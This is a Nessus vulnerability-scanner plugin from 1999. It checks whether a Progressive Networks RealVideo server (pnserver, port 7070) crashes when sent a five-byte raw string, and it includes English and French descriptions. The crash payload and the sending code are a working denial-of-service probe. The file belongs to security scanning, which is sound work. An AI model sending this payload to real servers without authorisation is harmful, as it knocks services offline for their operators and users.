home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / pnserver.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  87 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10183);
  10.  script_version ("$Revision: 1.13 $");
  11.  script_cve_id("CAN-1999-0271");
  12.  name["english"] = "pnserver crash";
  13.  name["francais"] = "crash de pnserver";
  14.  script_name(english:name["english"], francais:name["francais"]);
  15.  
  16.  desc["english"] = "
  17. It was possible to crash the remote
  18. Progressive Networks Real Video Server
  19. by sending it some garbage.
  20.  
  21. An attacker may use this flaw to prevent
  22. you from sharing sound and video, which
  23. may alter the quality of your service
  24.  
  25. Solution : Contact Progressive Networks for
  26. a patch.
  27.  
  28. Risk factor : Medium";
  29.  
  30.  desc["francais"] = "
  31. Il s'est avΘrΘ possible de faire planter le
  32. serveur Real Video de Progressive Networks
  33. qui tournait sur cette machine en lui
  34. envoyant n'importe quoi.
  35.  
  36. Un pirate peut utiliser ce problΦme pour
  37. vous empecher de partager son et vidΘo,
  38. altΘrant ainsi la qualitΘ de votre
  39. service.
  40.  
  41. Solution : Contactez Progressive Networks et demandez un
  42. patch.
  43.  
  44. Facteur de risque : Moyen";
  45.  
  46.  script_description(english:desc["english"], francais:desc["francais"]);
  47.  
  48.  summary["english"] = "Crashes the remote pnserver";
  49.  summary["francais"] = "Plante le pnserver distant";
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_DENIAL);
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  56.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  57.  family["english"] = "Denial of Service";
  58.  family["francais"] = "DΘni de service";
  59.  script_family(english:family["english"],  francais:family["francais"]);
  60.  
  61.  script_require_ports(7070, "Services/realserver");
  62.  script_dependencies("find_service.nes");
  63.  exit(0);
  64. }
  65.  
  66. #
  67. # The script code starts here
  68. #
  69.  
  70. port = get_kb_item("Services/realserver");
  71. if(!port)port = 7070;
  72. if(get_port_state(port))
  73. {
  74.  soc = open_sock_tcp(port);
  75.  if(soc)
  76.  {
  77.   crp = raw_string(255,244,255,253,6);
  78.   send(socket:soc, data:crp, length:5);
  79.   close(soc);
  80.   sleep(5);
  81.   
  82.   soc2 = open_sock_tcp(port);
  83.   if(!soc2)security_warning(port);
  84.   else close(soc2);
  85.   }
  86. }
  87.